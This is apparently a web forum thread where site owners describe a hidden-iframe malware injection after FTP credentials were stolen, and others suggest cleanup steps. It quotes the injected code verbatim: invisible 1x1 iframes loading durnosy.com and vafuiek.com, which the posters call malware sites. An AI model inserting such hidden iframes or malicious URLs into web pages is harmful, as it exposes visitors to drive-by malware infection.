Hello: My website was infected about 3-4 weeks ago. 2 persons told me they got a warning message about malware with a text link to durnosy.com which IS a malware site. The problem is that I never got the warning mesage and many other people were able to log in without any warnings. In short, some people get the malware message, some don't. This is why its hard to pinpoint the type of malware. My webmaster was able to download all the files and clean some of the stuff out. We obviously have some type of malware going on. Here's the website www.memyselfandigifts.com I really appreciate your help with this!
Because some people have strong anti virus, and some don't have strong (updated) ant virus. I saw this iframe on site . Check it, and remove it from all pages. and some script is running on your site. double check every folder and file. or contact with some expert , so he/she can remove it from your site. I can do it for you
Hi On Tuesday I browsed to a well known motorcycle retailers website. AVG free told me it has found a virus and i added it to the vault. Yesterday i was horrified to discover that this virus has somehowsent my ftp filezilla config file to someone and now all of the websites under my control are infected with the : <iframe src="http://durnosy.com/?click=26FA55" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> I have been through most of the sites and removed the above line. (There were also other iframes that were doing the same sort of thing.) The ftp passwords were changed by my boss as he has a Mac and i wasnt sure my machine was safe. It would appear that with the ftp information all the files for each site were downloaded onto the hosts computer and the files changed and uploaded back onto the sites domain. I have since got a 12 month subscription to McAfee installed on my laptop. I have been to a site i know is dodgy (i havent fixed it yet) on two machines, one uses mcAfee, one uses avg free. Neither av programs highlighted an issue which is worrying. How do I know if i have removed everything from the domain and my laptop? Is it just the files it changes or does it upload a script to reproduce the changes? Any help would be great as im struggling to get my head round this. Thanks Darren p.s. What is the script doing?
Do you have your files in your local computer infected? Maybe your hosting was compromised and infecting all web files. Try to contact your hosting provider and tell them about your problem.
I got blasted with this on my website too. It took about a week for us to notice and it's taking awhile for us to clean it up. It seems to add that iframe code to every page that has the words "index" "main" or "defualt" in the filename. But each 'click code' is unique so I can't do a mass search and replace. I have to delete and upload manually. I think I have over 200 files infected on my website. I host with A2Hosting. I have no idea how we got infected. And I have no idea what it may have done to people browsing my website. This is the site: http://www.healthyschoolscampaign.org
Our local files were fine. They were infected on the host. Our web host claims that our password must have been compromised. But it's such a wierd infection. I just don't get it.
The iframe was stripped and we could not find any scripts in the website. However, I checked the source codee this morning and I have another virus <iframe src="http://vafuiek.com/?click=F34807" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> Is there someone that can help me to scan these files properly and solve this once and for all? I don't feel I have the expertise to this the right way.
From my experience, it is rarely the webhost that is infected. It is the end user's computer or a computer that the end user has used, that is infected. As DazlerD said, the virus or trojan runs on your computer and looks for your account's username and password and sends that information to hacker groups. These users then log into your account via FTP and download your index pages or other html documents, inject iframe or javascript code into the pages, and then reupload them to your website. The point being here, is that you have a virus, trojan, or key logger running on your computer. You need to find this and resolve this issue to prevent the problem from reoccurring. If you clean the files, change your account password, store that new password on your computer (i.e. in your FTP client's site manager or perhaps in your web browser if you save your username and password in the dialog box that asks for your username and password when accessing your control panel) without cleaning the virus/trojan/key logger, then you are just going to have this happen to you again. I would be interested to know if a lot of people that experience this problem are using Internet Explorer or Firefox, or some other web browser, as their primary web browser. Most of the infections that I have seen have come from people that use Internet Explorer as their primary web browser. I'm not sure if there is anything to this or if it is just chance circumstances.
In the future, you should disable write permissions for the entire web directory. Have a separate account for ftp that isn't linked in any way to the account running the site.